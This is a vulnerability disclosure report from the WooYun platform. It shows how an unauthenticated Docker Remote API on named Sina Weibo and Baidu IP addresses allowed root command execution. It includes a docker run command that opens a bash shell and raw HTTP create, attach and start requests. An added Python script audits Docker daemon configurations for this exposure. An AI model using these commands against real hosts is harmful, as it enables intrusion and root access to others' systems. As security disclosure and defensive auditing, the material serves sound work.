Sina Weibo: unauthenticated access to the Docker Remote API leads to remote command execution (root)

ID: 209856
URL: http://www.wooyun.org/bug.php?action=view&id=209856
Status: the vulnerability was reported to the vendor, but the vendor ignored it
Title: Sina Weibo: unauthenticated access to the Docker Remote API leads to remote command execution (root)
Type: unauthorized access / privilege bypass
Vendor: Sina Weibo
White hat: lijiejie
Submitted: 2016-05-17 20:55:00
Published: 2016-05-17 21:07:00
Fix time: (not set)
Confirmed: 0000-00-00 00:00:00
Confirm spend: -1
Tags: (none)
Followers: 0
Favorites: 0
White hat rating: (none)
White hat self-rating: rank 15
Vendor rating: (none)
Vendor rank: 0
Summary
Two Sina Weibo IPs expose the Docker Remote API without authentication, which leads to remote command execution with root privileges. Because the Docker version is too old, I temporarily used Burp to send a few HTTP requests that call the API and achieve remote command execution. This write-up also describes how to obtain an interactive shell directly.
Details

http://123.125.105.158:2375/version
http://123.125.105.159:2375/version


"ApiVersion":"1.17". Because the version is so old, my docker client cannot talk to it. I used Burp to send the requests instead and achieved remote command execution; there is a small trick involved.

(image: weibo.apiversion.png)

POC

Install the docker client:

https://www.docker.com/products/docker-toolbox


Taking the Baidu IP as an example: to get an interactive shell, first list the images:

docker -H tcp://180.76.161.55:2375 images


docker -H tcp://180.76.161.55:2375 run -it --entrypoint /bin/bash ubuntu "-h"


Here I set the entrypoint to /bin/bash. Shell obtained, as shown below:

(image: baidu_shell.png)


Now back to the Weibo machines. Because the API version is too old, the client cannot be used directly.
At first my commands kept failing; only when I inspected the container did I find that the default Entrypoint is /usr/local/sinasrv2/sbin/nginx. It can be overridden when the container is created, though. Create a container:

POST /v1.17/containers/create HTTP/1.1
Host: 123.125.105.158:2375
User-Agent: Docker-Client/1.7.0 (windows)
Content-Length: 1082
Content-Type: application/json
Accept-Encoding: gzip

{"Hostname":"","Domainname":"","User":"","AttachStdin":true,"AttachStdout":true,"AttachStderr":true,"ExposedPorts":{},"PublishService":"","Tty":true,"OpenStdin":true,"StdinOnce":true,"Env":[],"Cmd":["-h"],"Image":"registry.intra.weibo.com/weibo_blogarticle/tfs-nginx:20150625","Volumes":{},"VolumeDriver":"","WorkingDir":"","Entrypoint":["/bin/bash","-c"],"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"Labels":{},"HostConfig":{"Binds":null,"ContainerIDFile":"","LxcConf":[],"Memory":0,"MemorySwap":0,"CpuShares":0,"CpuPeriod":0,"CpusetCpus":"","CpusetMems":"","CpuQuota":0,"BlkioWeight":0,"OomKillDisable":false,"MemorySwappiness":-1,"Privileged":false,"PortBindings":{},"Links":null,"PublishAllPorts":false,"Dns":null,"DnsSearch":null,"ExtraHosts":null,"VolumesFrom":null,"Devices":[],"NetworkMode":"","IpcMode":"","PidMode":"","UTSMode":"","CapAdd":null,"CapDrop":null,"GroupAdd":null,"RestartPolicy":{"Name":"no","MaximumRetryCount":0},"SecurityOpt":null,"ReadonlyRootfs":false,"Ulimits":null,"LogConfig":{"Type":"","Config":{}},"CgroupParent":"","ConsoleSize":[42,80]}}


Find the Id in the response, as shown:

(image: weibo_create_container.png)


You can then fetch the container's details to check that nothing is wrong; this step can be skipped:

http://123.125.105.158:2375/v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/json


Next come two HTTP requests. The order is very important: attach first, then start, so that the output can be captured:

POST /v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/attach?stderr=1&stdin=1&stdout=1&stream=1 HTTP/1.1
Host: 123.125.105.158:2375
User-Agent: Docker-Client/1.7.0 (windows)
Content-Length: 0
Content-Type: application/json
Accept-Encoding: gzip


POST /v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/start HTTP/1.1
Host: 123.125.105.158:2375
User-Agent: Docker-Client/1.7.0 (windows)
Content-Length: 0
Content-Type: application/json
Accept-Encoding: gzip


As shown, I executed commands inside Weibo's container: the current user is root, the hostname is bcd44e3731cc, and pwd is app.

(image: weibo.rce.out.png)


Fix

Do not expose port 2375 externally.
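The report's fix is a one-liner, so here is a defender-side check that turns it into something auditable. This is an added example, not code from the report or from Docker: it parses a dockerd command line or a daemon.json document, lists the TCP listeners, and flags any that are reachable off-host without --tlsverify (mutual TLS). The command lines and daemon.json documents below are constructed for the example; the flag names (-H/--host, --tlsverify, --tlscacert, --tlscert, --tlskey) and the daemon.json keys (hosts, tlsverify, ...) are the real dockerd ones, while the certificate paths are placeholders.

```python
import json
import shlex
from urllib.parse import urlparse

# Constructed sample inputs for this example (not taken from the report):
# a dockerd command line and a daemon.json, each in a weak and a hardened form.
WEAK_CMDLINE = "dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock"
HARDENED_CMDLINE = (
    "dockerd -H tcp://0.0.0.0:2376 --tlsverify "
    "--tlscacert=/etc/docker/ca.pem --tlscert=/etc/docker/server-cert.pem "
    "--tlskey=/etc/docker/server-key.pem"
)
WEAK_DAEMON_JSON = '{"hosts": ["tcp://0.0.0.0:2375", "unix:///var/run/docker.sock"]}'
HARDENED_DAEMON_JSON = (
    '{"hosts": ["unix:///var/run/docker.sock", "tcp://127.0.0.1:2376"],'
    ' "tls": true, "tlsverify": true, "tlscacert": "/etc/docker/ca.pem",'
    ' "tlscert": "/etc/docker/server-cert.pem", "tlskey": "/etc/docker/server-key.pem"}'
)

# Listener addresses that are only reachable from the host itself.
LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def parse_cmdline(cmdline):
    """Pull the -H/--host listeners and the --tlsverify flag out of a dockerd command line."""
    args = shlex.split(cmdline)
    hosts, tlsverify = [], False
    i = 0
    while i < len(args):
        arg = args[i]
        if arg in ("-H", "--host") and i + 1 < len(args):
            hosts.append(args[i + 1])
            i += 2
            continue
        if arg.startswith(("-H=", "--host=")):
            hosts.append(arg.split("=", 1)[1])
        elif arg in ("--tlsverify", "--tlsverify=true"):
            tlsverify = True
        i += 1
    return {"hosts": hosts, "tlsverify": tlsverify}


def parse_daemon_json(text):
    """Read the same two settings from a daemon.json document."""
    cfg = json.loads(text)
    return {"hosts": cfg.get("hosts", []), "tlsverify": bool(cfg.get("tlsverify", False))}


def audit(cfg):
    """Return one finding per TCP listener that is reachable off-host without
    client-certificate verification. An empty list means no unauthenticated
    Remote API is exposed to the network."""
    findings = []
    for listener in cfg["hosts"]:
        url = urlparse(listener)
        if url.scheme != "tcp":
            continue  # unix:// and fd:// sockets are governed by file permissions, not the network
        host = url.hostname or ""  # empty, 0.0.0.0 or :: all mean "every interface"
        if host in LOOPBACK:
            continue
        if not cfg["tlsverify"]:
            findings.append(
                f"{listener}: Docker Remote API reachable over the network without --tlsverify; "
                "anyone who can connect can create and start containers as root"
            )
    return findings


if __name__ == "__main__":
    for label, cfg in (
        ("weak cmdline", parse_cmdline(WEAK_CMDLINE)),
        ("hardened cmdline", parse_cmdline(HARDENED_CMDLINE)),
        ("weak daemon.json", parse_daemon_json(WEAK_DAEMON_JSON)),
        ("hardened daemon.json", parse_daemon_json(HARDENED_DAEMON_JSON)),
    ):
        print(label, "->", audit(cfg) or "OK")
```

Two things the check deliberately treats as equivalent: a listener bound to 0.0.0.0 and one bound to a specific non-loopback address are both "reachable off-host", and a bare TCP listener on 2376 is no better than one on 2375 unless --tlsverify is set. Binding to loopback only, or keeping the unix socket alone, is the configuration the report's fix describes; a firewall rule in front of the port is a second layer, not a substitute.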

Status: 2016-05-17: details have been sent to the vendor and are awaiting the vendor's handling
2016-05-17: the vendor has actively ignored the vulnerability; details are disclosed to the public
Vendor reply: fixed before the vulnerability was submitted, hence ignored.
Response: severity: no impact; vendor ignored; ignored at: 2016-05-17 21:07
Comments (content, commenter, likes, time)

@黑客,绝对是黑客 Great work, and thanks for sharing the vulnerability on wooyun too!

lijiejie, 0 likes, 2016-05-17 21:19:00

Looking back, this was actually in my IP list, but my eyes were tired and I missed it~

黑客,绝对是黑客, 0 likes, 2016-05-17 21:14:00